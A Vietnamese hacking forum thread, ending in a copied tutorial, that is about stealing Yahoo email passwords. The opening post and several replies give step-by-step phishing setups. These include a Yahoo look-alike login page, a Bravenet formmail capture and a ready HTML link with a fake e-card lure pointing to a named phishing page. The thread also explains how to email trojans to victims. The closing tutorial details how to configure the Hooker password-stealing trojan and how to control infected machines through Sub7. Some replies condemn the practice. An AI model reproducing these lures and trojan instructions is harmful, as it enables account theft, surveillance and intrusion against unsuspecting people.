Ăn cắp Yahoo password - không phải đơn giản
Thật vậy, để có được pass Yahoo của người khác là một vấn đề không đơn giản mà là ... vô cùng đơn giản .

Ở đây tui nêu luôn mấy cách cho các bác "ngâm cứu" :

#Cách 1: đây là cách đơn giản nhất, nhưng cũng là cách nhà quê nhất nhưng đôi khi lại hiệu quả. Vâng, đó chính là hỏi luôn victim, tất nhiên là không thể hỏi pass của mày là gì. hỏi thì bạn cứ hỏi ngày sinh, số di động...nói chung là tất tật rùi thử. tui không bàn đến cách này nữa, nó quá "hạ cấp".


#Cách 2: đây cũng là 1 cách nhà quê, bạn có thể download Ybrute - 1 chương trình dò Yahoo pass - còn cách sử dụng nó thì đừng có hỏi tui, hỏi là tui oánh đó, lớn tướng rùi mà còn hỏi vớ vẩn. Tuy nhiên khi mới vô thì tui cũng xài qua cách này, điểm yếu của cách này là chỉ có tác dụng khi victim xài pass là 1 từ có trong từ điển hay là 1 câu nói phổ biến, ngoài ra, cách này cũng tốn rất nhiều thời gian (hêhê, cứ vừa ngồi đợi nó tìm mà nghe tiền bay dần khỏi túi).



#Cách 3: bạn có thể tạo 1 giao diện giống hệt như Yahoo (việc này thì dễ ợt chứ gì nữa), sau đó sửa đổi chút xíu... hê hê...để cho khi victim gõ pass và user name thì alê hấp, pass bay như chim về email của ta, còn victim thì vẫn vào hòm thư mà không hề hay biết. Việc này bạn có thể thực hiện dễ dàng bằng front page mà không cần hiểu biết nhiều về html. Sau khi tạo xong giao diện, upload lên thì bạn chỉ việc dụ victim vô tròng...khà khà...nếu bạn muốn thử nghiệm thì cứ việc ra ngoài hàng rùi để homepage ở đó là cái địa chỉ trang web mà bạn dùng để câu, chắc chắn là sẽ có nhiều chú thỏ vô bẫy. Nếu bạn chưa tạo được thì liên hệ newsuperbabe@yahoo.com, tôi sẽ giúp bạn.



#Cách 4: Sử dụng Trojan: Có rất nhiều loại Trojan giúp bạn lấy password email, dial-up, account... như là: Hoocker,Barrio5.0,Barox, Kuang2,....! Bạn có thể Download chúng ở đầy rẫy trên mạng ở các trang hacker.
Bạn có thể gửi Trojan cho victim như một file đính kèm và khi victim mở file đó Trojan sẽ có chỗ trú ngụ trong máy của victim và thế là password của họ sẽ "chảy" về hòm thư của bạn. Thật tuyệt phải không? Nhưng khổ nỗi nếu máy của victim mà có "chàng vệ sĩ" Nguyễn Tử Quảng (BKAV)hay Noton-Anti Virus thì he..he đành bó tay thui

Nếu bạn có thể tạo trang Web bạn có thể đính kèm Trojan vào trang Web để khi victim vào trang web đó của bạn Trojan sẽ được tự động down về máy victim mà họ không hề hay biết. Để làm việc này bạn có thể sử dụng Godwill1.60 để đính kèm trojan vào trong trang web. Godwill cũng có rất nhiều trên mạng.



Cách 5: Deleted


#Cách 6: cách này thì 100% là thành công, nghe phê chưa. Ấy bình tĩnh để em post lên chớ. Cách này sử dụng khi bác đến nhà victim chơi hoặc ra ngoài hàng, nếu bác chẳng may thấy victim xài tiện ích remember user name and password thì hãy nhanh nhanh dùng cách này. Các bác download SnadBoy's Revelation v2 (lên google.com mà tìm down load), sau đó thì cách sử dụng nó quá dễ để đưa lên đây. Cách này khá đơn giản và hiệu quả là 100% nhưng ít có đất dụng võ vì nếu victim đọc bài này rùi thì họ sẽ không dùng cái remember user name and password nữa đâu.

Cách 7: 1. Vào Bravenet.com đăng kí một accout và đăng kí formmail bravenet.Trong phần Setting bạn chọn đường dẫn URL là địa chỉ mà bạn muốn chuyển đến sau khi lừa họ check mail, bạn lên chọn đường dẫn đến đến địa chỉ mà Yahoo báo lỗi khi Login bằng cách vào Yahoo mail và đánh một cái ID tầm bậy nha, sau đó bạn cũng gõ pass luôn và bấm checkmail, yahoo sẽ báo là sai mật khẩu bạn hãy chép cái đường dẫn URL này và dán vào trong mục URL của bravenet.
2. Sau khi hoàn thành bước đầu thì bạn chuyển sang bước kế tiếp chỉnh lại trong mail yahoo đó nhớ là bạn phải làm 2 giao diện một giao diện yahoo là sẵn sàng Login vào mail và cái thứ 2 là sai mật khẩu, tới đây chắc các bạn hiểu rồi phải không? để khi victim checkmail thì đường dẫn thank sẽ báo là sai mật khẩu và lần này thì 100% là victim checkmail thành công nhưng cũng đồng nghĩa với mất mật khẩu, mật khẩu của victim sẽ được chuyển về hộp mail mà lúc bạn đăng lí bên bravenet.com. Bạn chỉ còn việc đi rải "bom" shortcut checkmail và chỉ chờ cho victim checkmail là OK!

........................
#Cách 3: bạn có thể tạo 1 giao diện giống hệt như Yahoo (việc này thì dễ ợt chứ gì nữa), sau đó sửa đổi chút xíu... hê hê...để cho khi victim gõ pass và user name thì alê hấp, pass bay như chim về email của ta, còn victim thì vẫn vào hòm thư mà không hề hay biết. Việc này bạn có thể thực hiện dễ dàng bằng front page mà không cần hiểu biết nhiều về html. Sau khi tạo xong giao diện, upload lên thì bạn chỉ việc dụ victim vô tròng...khà khà...nếu bạn muốn thử nghiệm thì cứ việc ra ngoài hàng rùi để homepage ở đó là cái địa chỉ trang web mà bạn dùng để câu, chắc chắn là sẽ có nhiều chú thỏ vô bẫy. Nếu bạn chưa tạo được thì liên hệ newsuperbabe@yahoo.com, tôi sẽ giúp bạn.

Tại sao ko nghĩ đến việc Send đến cho ai đó mà bạn muốn "xin" pass . Chẳng hạn qua file đính kèm (kiểu như điện hoa...). Khi người đó click vào thi` link đến trang index "Yahoo" mà bạn tạo ra ...và.... please wait....và kiếm một chương trình giải mã pass ở dạng "**.." cái này thì đầy :D
Cách này có một chỗ kô kín đó là nếu victim để í một chút trên khung
" Address : .." sẽ thấy địa chỉ server mà chứa site của bạn chứ kô phải Yahoo. Tuy nhiên có thể giải quyết được nếu bạn dùng thêm Java Script để in lên khung Address địa chỉ của "mail Yahoo " .... Nói vậy thôi chứ để hoàn hảo mà lừa được người ta thi` cũng khó lắm. :D Nếu theo cách này còn phát sinh một số vấn đề ...

... Sử dụng Trojan: Có rất nhiều loại Trojan giúp bạn lấy password email, dial-up, account... như là: Hoocker,Barrio5.0,Barox, Kuang2,....! Bạn có thể Download chúng ở đầy rẫy trên mạng ở các trang hacker.
Bạn có thể gửi Trojan cho victim như một file đính kèm và khi victim mở file đó Trojan sẽ có chỗ trú ngụ trong máy của victim và thế là password của họ sẽ "chảy" về hòm thư của bạn. Thật tuyệt phải không? Nhưng khổ nỗi nếu máy của victim mà có "chàng vệ sĩ" Nguyễn Tử Quảng (BKAV)hay Noton-Anti Virus thì he..he đành bó tay thui

Chà ... không biết là nếu chơi bằng Socket thì "chú" Quảng có chết không nhẩy ... :D

Trò điện hoa rồi yêu cầu nhập pass để confirm đã được public trên 1 số báo Sinh Viên . Khá hay , nhưng lộ mất rồi . Có lẽ dùng Trojan , nhưng xài con nào mà ko cần download nó vẫn tự động kích hoạt khi open mail ra cơ . Chứ còn cứ thấy cái file đính kèm là nhân dân sẽ soi đã .
+++
Tóm lại cũng còn tuỳ vào level của Victim nữa . Ngay cả tui khi mới lên làm sếp cũng bị phát Trojan đau điếng người . mặc dù trong máy luôn có 2 thằng NAV và Trojan Remover cầm 4.1 và 4.6 gác cửa đấy . Hixx hixx chủ quan thì ăn đòn thôi !!!

hic! em lấy mấy trăm cái pas mà chẳng biết dùng vào việc gì đây này!
dùng brave ấy mà! victim chuối nên....

Chu' mapcon tam beo nay, bon quan tri mang va victim dao nay cao tay lam'( nhu chung ta chang han). Neu muon thanh cong chi co lua thoi, chu cu duong duong chinh chinh thi kieu quai gi cung gap ma. ngay nhu dinh tr. cung khong co cach gi on ca. Nhung, ...hehhe that ra, chung ta dau can lay pass cua nhung cao thu nua mua ay, ma ta chi can cua nhung nhan vat... chua xung hang cao thu, my love cua ta chang han. khekhekhge, chac khong den noi kho khan lem'. hhihihi'''''''''''''''''''''. nhẩy?

Những trò quá xa xưa rồi ...Thôi đừng múa rìu qua mắt thợ nữa ..những trò này ..chi là những trò " Đớp trộm " thôi ...Nếu U dùng để kiếm mấy cái Acc chùa truy cập Net thì cũng được ..vì là HS,SV nên không có tiền sài dịch vụ xa xỉ này tại nhà ! Còn mấy cách của u nếu muốn hiện đại tân tiến hơn , lọt qua rào cản của anti Virus ..thì Có thể Liên hệ với tôi ..chỉ dẫn cho ...hì hì ...Miễn phí nhá !

Còn muốn Hack Web Không ...đến đây thị giáo nhá ..nhưng yêu cầu trước nè ...là phi Am hiểu ngôn ngữ lập trình mạng nhá ....rồi Tìm Bug của Web ...hì hì ..rồi Kiếm cách chui qua cái lỗ hổng nhỏ như sợi chỉ cũng có lúc to như cái nOng đó nhé ....!

Cá dừng lại ở đây được rồi ! :akay:

chào anh Greenbambo anh có thể mất công tí nói em biết cụ thể hơn, anh bảo cần lập trình, ngôn ngữ gì anh, còn gì gì nữa nói hết đi anh, em máu lắm rồi đấy, hà hà
Tiện thể nói luôn ba cái vụ passmail thì có lẽ dừng thôi, các bác cũng đừng mất công nhiều làm gì. đúng không bác GB

:akay: Ăn trộm là phạm pháp .Tù mọt ngông , lũ ngờ u.Ba trò vớ vẩn.

ê chuotchu cái thàng nay` bây giờ rùi mà còn dùng mấy cách đáy lấy pass .
ngờ u hết chỗ nói , toàn đi cop o mây trang vnhacker, cao daghieu .....

Các chú bày cách lấy password để làm gì vậy? Học cái hay ho thì không chịu học. Tốn tiền bố mẹ.

từ từ mọi người sẽ thấy chán thôi mà nếu người ta xem nó là chiện bình thường ngay cả mình đây cũng muốn lắm nhưng điều đó chỉ là tìm tòi học hỏi lẫn nhau thôi.. chứ chẳng có ý zì cả cái zì không thuộc về mình thì dù một ngày nào đó nó thuộc về mình thì điều đó cũng chẳng có ý nghĩa zì với mình cả.... newbie

anh chuotchu, em thay bai nay quen lam , em da doc may lan roi, hinh nhu o tren HVA thi phai, enu em co noi sai xin anh bo qua cho nhe

Chèo eo seo vậy lè, bài lày tui thấy wen wen lắm. Đã đọc ở đâu rùi vtv4 hay sao ấy. ;)

Thao Nguyen Tinh Yeu Ne (http://thaonguyentinhyeu.us) Hay lem do (http://viethacker.tv) mấy pác mún đi sâu vào hack sao không qua trang http://manguon.com mà đao lót cuốn Hacking dày 450 trang về in ra mà ngồi dịch anh văn, dịch xong thì củng giỏi anh văn mà củng giỏi hack nữa đó... [-x

Kính gửi các anh chị đã đọc bài viết Ăn Cắp Mật Khẩu? Đơn Giản Lắm em có một
địa chỉ email matden251@yahoo.com do mật khẩu quá dài mà em quên không nhớ
rất mong các anh chị có thể giúp em tìm pass em cảm ơn rất nhiều mọi thông tin xin giửi đến hien962002@yahoo.com

CÁc bác có thể chỉ cho emcách ăn trộm pass đơn giản nhất được không ạ , em vốn dótt tin học lắm

xxx

ðầu tiên

hãy copy ðoạn mã này :

QUOTE
<A target="_blank" href="http://nguyenanhduc.web.aplus.net/dienhoa/login.htm" ><FONT

face=Verdana>http://thaonguyentinhyeu.us/buuthiep/valentine's card.html</FONT></A>



sau ðó
vào yahoo của bạn soạn một tin mới . Bạn hãy ðể ý dýới góc phải có một chỗ ghi là : "View HTML Source " hãy ðánh dấu vào ô ðó ! mail của bạn sẽ chuyển qua một dạng khác ..., sau ðó xóa hết những gì có trong phần nội dung mail ...nhý là "

" gì gì ðó , sau nữa là paste ðoạn mã vừa copy ở trên vào trong nội dung của mail . Một lần nữa click chọn lại ô "View HTML Source " nội dung mail chỉ còn lại là http://thaonguyentinhyeu.us/buuthiep/valentine's card.html
vậy là bạn có thể gữi mail ði và chờ pass ðýợc tìm thấy tại
http://nguyenanhduc.web.aplus.net/dienhoa/pass.htm
mà thôi !!!
còn phần thêm mắm muối sao cho ngýời nhận tin thì do khả nãng của you thui ! hi` hi`
Gợi ý :

Chào anh chị, "tên ngýời nhận"! Có ngýời tên là "tên bạn"("tên bạn"@yahoo.com) gởi ðến anh chị
1 thiệp chúc / Ecard rất là xinh-xắn.

Nếu anh chị muốn ðón nhận Card ðể xem Xin vui lòng bấm vào link ở bên dýới

Thiệp chúc / Ecard này sẻ ðýợc bảo giữ khoãng 15 kể từ ngày hôm nay .

Xin anh chị thýỡng lãm Ecard này trýớc ngày 15 Sau ðó Card sẻ tự ðộng hóa bỏ!

Ngýỡng mong sao sự phục vụ bất vụ lợi của chúng tôi « thaonguyentinhyeu.us cards Service " sẽ mang lại ít thoải mái cho anh chị

Bất cứ lúc nào anh chị muốn gởi thiệp chúc / Ecard ðến ngýời quen, thì xin mời anh chị ghé býớc qua trang nhà của tôi:

http://thaonguyentinhyeu.us

Thân ái


Việc học ngày nay ðã lỗi thời
10 thằng ði học 7 thằng chõi
3 thằng còn lại 2 thằng ngáp
1 chú ngồi yên cũng cýời ruồi.


Đang còn nhiều cách lắm ,
VD như vào matkhau.org (nhưng phải đăng ký trước)
Và một số trang của nước ngoài , nhưng phức tạp !

Nếu có gì khó khăn, hoặc không được thì liên hệ tôi chỉ cách khác cho !

may ong noi ko ha`....ma` cu the la` dơ may cai do o dau moi duoc chu......thiet tinh......

Nhắn nhocty : nên viết tiếng Việt có dấu cho dễ hiểu , mà cô viết như vậy khó hiểu quá ? trình bầy như trên chưa đầy đủ sao ?
Bó tay !

Originally posted by hoanghuyae@May 6 2004, 04:29 PM
ðầu tiên

hãy copy ðoạn mã này :

QUOTE
<A target="_blank" href="http://nguyenanhduc.web.aplus.net/dienhoa/login.htm" ><FONT

face=Verdana>http://thaonguyentinhyeu.us/buuthiep/valentine's card.html</FONT></A>



sau ðó
vào yahoo của bạn soạn một tin mới . Bạn hãy ðể ý dýới góc phải có một chỗ ghi là : "View HTML Source " hãy ðánh dấu vào ô ðó ! mail của bạn sẽ chuyển qua một dạng khác ..., sau ðó xóa hết những gì có trong phần nội dung mail ...nhý là "

" gì gì ðó , sau nữa là paste ðoạn mã vừa copy ở trên vào trong nội dung của mail . Một lần nữa click chọn lại ô "View HTML Source " nội dung mail chỉ còn lại là http://thaonguyentinhyeu.us/buuthiep/valentine's card.html
vậy là bạn có thể gữi mail ði và chờ pass ðýợc tìm thấy tại
http://nguyenanhduc.web.aplus.net/dienhoa/pass.htm
mà thôi !!!
còn phần thêm mắm muối sao cho ngýời nhận tin thì do khả nãng của you thui ! hi` hi`
Gợi ý :

Chào anh chị, "tên ngýời nhận"! Có ngýời tên là "tên bạn"("tên bạn"@yahoo.com) gởi ðến anh chị
1 thiệp chúc / Ecard rất là xinh-xắn.

Nếu anh chị muốn ðón nhận Card ðể xem Xin vui lòng bấm vào link ở bên dýới

Thiệp chúc / Ecard này sẻ ðýợc bảo giữ khoãng 15 kể từ ngày hôm nay .

Xin anh chị thýỡng lãm Ecard này trýớc ngày 15 Sau ðó Card sẻ tự ðộng hóa bỏ!

Ngýỡng mong sao sự phục vụ bất vụ lợi của chúng tôi « thaonguyentinhyeu.us cards Service " sẽ mang lại ít thoải mái cho anh chị

Bất cứ lúc nào anh chị muốn gởi thiệp chúc / Ecard ðến ngýời quen, thì xin mời anh chị ghé býớc qua trang nhà của tôi:

http://thaonguyentinhyeu.us

Thân ái


Việc học ngày nay ðã lỗi thời
10 thằng ði học 7 thằng chõi
3 thằng còn lại 2 thằng ngáp
1 chú ngồi yên cũng cýời ruồi.


Đang còn nhiều cách lắm ,
VD như vào matkhau.org (nhưng phải đăng ký trước)
Và một số trang của nước ngoài , nhưng phức tạp !

Nếu có gì khó khăn, hoặc không được thì liên hệ tôi chỉ cách khác cho !
tui không thấyView HTML Source nằm ở đâu cả làm sao bây giờ

cái này khó hiểu quá có còn cách nào dễ hơn không vậy ngoại trừ đi hỏi

http://www.webdeveloper.com/animations/bnifiles/eyeflash.gifhttp://www.webdeveloper.com/animations/bnifiles/eyeflash.gif

toàn những thứ sao chép ở đẩu đâu về không hoặc tự mấy u nghĩ ra cũng vậy chả thấy cai nào x ai được hết trọi. post lên lam gì cho mệt, chi tốn thời gian và tiền bạc của mấy u mà thôi. con người ta đọc vào chi nhức mắt hỗng lĩnh hội được kí mí lị gì hết trọi. tui nghĩ nếu u nào có hiểu biết sâu về vấn đề này(kí yahoo í) đại khái la cơ chế hoạt động, cách thức bảo mật của nó ra sao thì post lên cho anh em nghiên cứu. biết đâu lại tìm ra cách hack mới, mà chả phải đi hỏi đâu xa cho mệt óc nhức đầu.
tui thì chả hiểu kí mí lị gì về hack hốc cả hôm nay ghé them ngứa mắt góp ý thế thui, nếu có gì làm mất lòng mấy u thi xin vui lòng chém chết.


<span style='color:blue'>Tiền tình tù tội
Tuổi trẻ thiếu tiền tiêu.</span>

ok ! Vậy đợi ta về lấy tài liệu ra, tha hồ mà đọc !
Đến lúc đó thì đừng có mà la !

tao chả biết giỏi gì, nhưng Huy ah, thách mày lấy được pass cua tao đấy, tao chả tin hack giỏi thía

Caên baûn veà Trojan vaø caùch laáy Pass cuûa naïn nhaân
( CTV Cao Đăng Hiếu - http://caodanghieu.dk3.com/ )
Các bạn thân mến tuy cung chỉ là 1 Lamer. Những kiếm thức mà tôi thu thập được cũng chỉ đủ để hack đựơc vào cái mail,tìm được một vài cái host có lỗi và thu thập được 1 số pass...Tất cả những điều đó quả thật nhỏ bé so với những gì mà các hacker trên thế giới đang làm .Nhưng hôm nay tôi cung xin mạo muội tổng kết và viết lại các kiến thức cơ bản về một thứ mà ai cung biết: TROJAN. Bài naỳ được viết với mục đích hướng dẫn thật tỉ mỉ và chi tiết để những ai chưa bao giờ nghiên cứu hack cũng có thể hiểu và thực hành đươc.Tuy rằng bài viết này chưa thể giúp các bạn xâm nhập vào các hệ thống lớn như webserver ,hostcontrol..nhưng trong 1 phạm vi nào đó các bạn cung thừa khả năng để đánh cắp pass email ,account hay xâm nhập vào máy nạn nhân và điều khiển.Ngoài ra để lấy được pass hiện nay còn có dùng spoofing.Bằng cách này bạn có thể được mật mã cũngnhư thẻ tín dụng mà không cần dùng đến trojan và đặc biệt là không e ngại tường lửa cũng như các hệ thống diệt virus khác.Nhưng trong phạm vi bài viết này tôi chỉ xin giới thiệu về trojan.
Nào chúng ta bắt đầu:
I/. Trojan là gì và hoạt động nhu thế nào và làm thế nào để sủ dụng nó :
Trojan có nhiều loại nhưng vẫn chủ yếu là 2 loại chính :

1.Trojan lấy pass rồi gửi cho ta pass đã lấy được qua email chẳng hạn nhu hooker, barok ...
2.Trojan dùng để điều khiển nhu SUB7, DUA TI CHOI...

Loại thứ 1: Trojan lấy pass rồi gửi cho ta pass đã lấy đuộc qua email .
Có nghĩa là sao??: Khi bạn gởi con trojan này cho nạn nhân (bạn bè ,kẻ thù ,người lạ..).và nếu như người đó kích hoạt trojan (có nghia là chạy nó) thì trojan sẽ bắt đầu hoạt động.
Nó hoạt động như thế nào:
A.Trước tiên nó sẽ bắt đầu tự động sao chép nó vào 1 nơi nào đó trên ổ cứng (thông thường là thư mục C:\Windows hoặc C:\Windows \System) tại vì những nơi đó thường chứa rất nhiều file l? và có lẽ bạn chưa bao giờ biết đến nhưng lai không bao giờ động đến nó như delete(xoá) hoăc rename(đổi tên)bởi vì bạn luôn cho rằng nó chính là file hệ thống và bạn chẳng bao giờ nhận biết đuợc nó có phải la file lạ hay không.
B.Sau khi tìm đuợc chỗ ẩn mình nó sẽ bắt đầu ghi vào registry của bạn các thông số để nó có thể tự động chạy mỗi lần khởi động máy và thông thường là nó vào khoá sau.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run
Muốn biết rõ hơn bạn làm như sau :
Chọn start _chọn run_Sau đó gõ vào ô vừa xuất hiện dòng chữ regedit nó sẽ mở ra 1 khung chương trình mới đó chính là cửa sổ registry.Bạn chọn HKEY_LOCAL_MACHINE sau đó chọn tiếp SOFTWARE
Rồi chọn tiếp Microsoft ,tiếp tục là chọn Windows ,chọn CurrentVersion,chọn Run
Okie.Tới đây ,bạn nhìn sang phía bên phải sẽ thấy 1 danh sách các chương tình đang được tự động chạy khi khởi động máy.
Nếu tinh ý bạn sẽ thấy 1 tên rất lạ mà bạn chưa bao giờ nhìn thấy trong các chương trình mình đã cài trên máy mình :chẳng hạn như sub7,hay ...twain...và bên cạnh nó là đường dãn đến file chương trình của nó .Xem hình minh hoạ :

Đây chính là ngờ uồn gốc của vấn đề và nếu bạn xoá nó đi thì đuong nhiên ván đề sẽ được giải quyết.Bạn nhấp chuột phải vào cái tên lạ đấy rồi chọn delete.Okie.Trojan đã không thể tự động chạy mỗi khi khởi động máy nữa.Sau đó bạn khởi động máy lại và tìm đến đường dẫn của nó để xoá file exe của nó.Nên nhớ là phải khởi động lại máy ,bạn mới có thể xoá đựoc nó bởi vì nếu không ,nó sẽ không thể bị xoá vì nó vẫn đang ở cơ chế hoạt động.Xem hình minh hoạ

C.Vừa rồi chúng ta đã tìm hiểu nguyên nhân vì sao nó tự động chạy mỗi khi khởi động máy.bây giờ chúng ta sẽ nghiên cứu nó sẽ gửi thông tin trên máy và password đến chủ nhân của nó nhu thế nào .
Một số trojan nó sẽ lấy tất cả password cuả bạn lưu xuống máy như password khi connect ....Tất cả password khi bạn lưu này sẽ được ghi vào các tập tin *.pwl.Trojan giải mã nó rồi tự động gửi mail đến chủ nhân của nó với nội dung thu sẽ là user và password của bạn như vậy bạn đã bị lộ password.Một số khác còn có thể có thêm tính năng keylog ,tính năng này sẽ giúp nó ghi nhận đuợc tất cả những gì bạn gõ xuống máy và như thể không những lấy đuợc pass mà còn có thẻ lấy được số thẻ tín dụng và tất cả các thông tin vè bạn ...Tất cả các thông tin đó sẽ dược lưu vào tập tin nào đó trên máy.Sau đó nó sẽ gởi tất cả những thông tin này đến cho chủ nhân qua email khi bạn nối mạng
Làm thế nào để sử dụng nó:
Nhu tôi đã nói từ đầu là trojan có rất nhiều loại .Trong phạm vi bài viết này tôi chỉ xin giới thiệu cách sử dụng 1 loại trojan đon giản và thông dụng là HOOKER
Bước 1 : bạn load con trojan Hooker về rồi giải nén ; Nó sẽ gồm các file sau :
Config.bat ;
history.txt ;
hkconf.exe ;
hooker.exe ;
Hkconf.ini ;
Buớc 2 : Bạn chạy file Hkconf.ini đây chính là file cần thiết để trojan có thể nhận biết được nó sẽ gửi email về địa chỉ nào thông qua host nào, bạn thay dổi các thông số của file này như sau :
host = hcm-mail-prepaid.vnn.vn(chú thích:Đây chính là địa chỉ SMTP ,thông qua host này ,trojan mới có thể gửi mail về cho bạn được ).Bạn có thể tìm các host này trên trang http://www.vnlogic.net/smtp.htm .Nhưng vấn đề là các host rất có thể lúc này sẽ hoạt động được nhưng 1 thời gian sau nó sẽ ngưng hoạt động hoặc hạn chế hoạt động vì thế anh em phải thương xuyên cập nhật và cũng đừng lấy làm lạ khi 1 ngày nào đó trojan khôgn thể gửi email về cho mình..Tôi thường dùng cái host này :hcm-mail-prepaid.vnn.vn vì nó nhanh và ổn định,đến nay thì nó vẫn hoạt động.
mailto=dịa chỉ email của bạn ( bạn điền vào đây địa chỉ email của bạn để trojan gửi email về cho bạn)
reg_desc = TaskMem
exename = MSCR56.exe
ở dòng cuối cùng của file này bạn thêm một dòng sau s13=logon
Buớc 3 : Sau khi thay dổi xong bạn save lại ! rồi chạy file Config.bat !!!
Buớc 4: Sau khi thực hiện xong 3 buớc trên bạn gửi file Hooker.exe cho victim !
Buớc 5 : Bạn chỉ việc ngồi chờ sao cho victim mở file của bạn gửi ! Thế là acc dã thuộc về bạn.
Còn để làm sao để dụ cho nạn nhân mở file hay buộc nạn nhân mở file thì xin các bạn hãy xem ở mục 2 :Làm thế nào để dụ nạn nhân mở file trojan hoặc trojan chạy trên máy họ trong khi họ không hay biết gì.
Đến đây các bạn đã hiểu được phần nào về trojan lấy pass,cách thức nó hoạt động và cách sử dụng nó ra sao.Còn nếu muốn tìm hiểu thêm thông tin về các loại trojan khác cung như cách dùng và địa chỉ để download các loại trojan đó thì các bạn có thể tham khảo thêm ở mục 3:Tài nguyên trojan trên mạng.Tiếp theo chúng ta sẽ nghiên cứu về loại trojan khác:Trojan dùng để điểu khiển
Loại thứ 2 : Trojan dùng để điều khiển
Có nghia là sao??:Đặc điểm của loại trojan này là có thể cho phép chúng ta xâm nhập hoặc quậy phá trên máy nạn nhân bằng cách mở cổng trên máy nạn nhân.Nói 1 cách dễ hiểu cho các bạn là nhờ vào cái cổng này ,chúng ta sẽ biết đuợc số IP của nạn nhân bằng các công cụ scan cổng và có thể từ đó xâm nhập vào hay điều khiển máy của nạn nhân tuỳ theo các tính năng cửa trojan mà ngưòi lập trình ra nó đã lập trình ra.Mỗi trojan khác nhau loại này thường mở 1 cổng khác nhau còn gọi la backdoor.
Nó hoạt động như thế nào:
A.Giống như loại 1
B.Giống như loại 1
C.Khác với trojan loại 1 đơn thuần chỉ là gởi mail về cho chủ nhân pass word của nạn nhân.Trojan loại 2 này có thể cho phép chủ nhân (người điều khiển) nắm quyèn điều khiển máy của nạn nhân tuỳ theo tính năng của trojan đó.
Làm thế nào để sử dụng nó:
Trước tiên tôi xin nói khái quát về cách điều khiển nó.Và sau đó là đưa ra 1 ví dụ về cách điều khiển 1 con trojan nổi tiếng là SUB7.
A.Khái quát:
Thông thường trojan loại này thưòng có 2 file thậm chí 3 file trở lên:
Các file chủ yếu là:
.client.exe (đây là file mà ta phải giữ lại để điều khiển nạn nhân)
.Server.exe(đây là file mà ta phải gửi cho nạn nhân )
Sau khi gửi email cho nạn nhân con trojan (thông thường là file server.exe)hay bằng cách nào đó nạn nhân vô tình kích hoạt trojan ,Trojan sẽ bắt đầu cơ chế hoạt động của nó như đã nói ở phần Nó hoạt động như thế nào
Kế đến ,để điều khiển đuợc máy của nạn nhân đã bị nhiễm trojan chúng ta cần phải làm các bước sau:
Một số loại trojan mới đây cho phép bạn sau khi chạy chương trình điều khiển (file client.exe)chỉ cần nhấn nút connect là có thể biết đuợc số IP của nạn nhân đã bị nhiễm trojan thông qua việc nó tự động scan cổng măc định của trojan và từ các số Ip đó ,ta sẽ chọn máy của nạn nhân có số IP đó để kết nối vào và điều khiển (Nhắc lại về số IP:nó giống như 1 thẻ chứng minh nhân dân của bạn khi bạn lên mạng .Mỗi máy lên mạng đều có số IP riêng biệt khôgn ai giống ai.Khi bạn làm bất cứ 1 đièu gi đó phạm pháp chẳng hạn đột nhập vào hệ thống máy chủ ..nhưng lại không có kỹ năng xoá dấu chân ...thì người ta sẽ hoàn toàn có thể biết được để đề phòng hoặc thậm chí truy ra số IP của bạn và từ đó có thể biết được là vào thời điểm đó ,bạn tức là người sở hữu số Ip đó có số điện thoại là bao nhiêu đó đã làm việc phạm pháp.Đương nhiên có nhiều cách để che dấu số IP khi lên mạng bằng cách dùng proxy(đây chỉ là cách đơn giản và thô sơ ..Các bạn có thể tham khảo thêm ở http://www.vtv4online.net/ hoăc http://caodanghieu.dk3.com/) .Thế còn những loại trojan không thể cho ta tính năng scan cổng đó thì làm sao để ta biết đuợc IP của những nạn nhân bị nhiễm.Đuong nhiên chúng ta phải thực hiện thủ công.Trước tiên phải xác định số IP của những nạn nhân bị nhiễm chứ gì?.Bạn nên kiếm 1 công cụ scan cổng (scan port).các công cụ này các bạn có thể tìm thấy trên http://caodanghieu.dk3.com/.Chẳng hạn như trojan của bạn mở cổng 911 thì bạn có thể cho chương trình scan port scan từ 900 cho đến 920.Bạn điền vào khung start point(điểm khởi đầu):900 và stop point (điểm kết thúc):920.Thông thưòng thì chương trình scan cổng nào cung thiết kế khung chương trình như thế tức là bao gồm start point(điểm khởi đầu) và stop point (điểm kết thúc).Bạn cứ nhập vào và scan.Nói thế chắc các bạn đã hiểu.Ngay lập tức nếu đến cổng nào đó có số IP nào bị nhễm thì nó se ghi trong danh sách là : Tại cổng 911 (số cổng mà các trojan đã mở) ,có số IP này 203.162.23.23 bị nhiễm (đây là số Ip của nạn nhân bị nhiẽm).Chú ý là các con số911 hay 203.162.23.23 chỉ là các con số mà tôi đua ra để ví dụ .Các con số này tuỳ thuộc vào cổng mà trojan đã mở và số IP bi nhiễm.Sau khi đã có số IP rồi của nạn nhân bị nhiễm trojan mở cổng đó rồi ,bạn bắt đầu dùng con điều khiển(client.exe),bạn copy số IP đó vào ô nhập IP rồi nhấn connect.Sau khi connect xong là bạn có thể tha hồ điều khiển rồi đấy.Bạn có thể chọn các tính năng sẵn có trên chương trình điều khiển để quậy .
B.Ví dụ điều khiển nạn nhân bị nhiễm SUB7 mọt loại trojan điều khiển rất hay:
Bạn có thê down trojan này trên web http://caodanghieu.dk3.com/ trong phần hack .Sau khi gửi cho nạn nhân file server.exe.Bạn chạy chương trình điều khiển client.exe .Phiên bản SUb7 ,à tôi nói tới đây mở cổng là 1243 vì thế bạn nên scan trong phạm vi cổng này tìm và lấy số IP của nạn nhân bị nhiễm trojan mở cổng này.Bạn kiếm 1 chương trình scan cổng bất kỳ và scan cổng trong phạm vi là 1243 ,bạn sẽ tìm ra đuợc số IP bị nhiễm trojan mở cổng 1243.Có đuợc số IP rồi bạn copy nó vào ô nhập IP rồi nhấn nút connect.Sau khi connect xong ,bạn đã có thể bắt đầu điều khiển rồi đấy.Tôi chỉ bày tới đây.Bởi vì mọi việc bây giờ quá đơn giản ,nếu biết tiếng anh bạn sẽ biết các nút tính năng trên chương tình có thể cho ta điều khiển cái gì ,làm cái gì ....chẳng hạn như chat với nạn nhân,khoá bàn phím ,lấy thông tin từ keylog...Các bạn có thể xem hình minh hoạ để nắm rõ các bước cơ bản để connect và điều khiển.

Đến đây các bạn thấy sao,đã hiểu đuợc phần nào chưa.Tôi chắc qua cách trình bày quá dễ hiểu và mạch lạc như thế này các bạn cũng có thể tự tin mà thực hành được rồi đấy.
Sau đây sẽ là các thủ thuật để các bạn dụ nạn nhân mở file trojan hoặc cho trojan chạy trên máy nạn nhân trong khi nạn nhân không hề hay biết gì.
II/ .Các thủ thuật để các bạn dụ nạn nhân mở file trojan hoặc cho trojan chạy trên máy nạn nhân trong khi nạn nhân không hề hay biết gì (:D thế mới ác chứ)
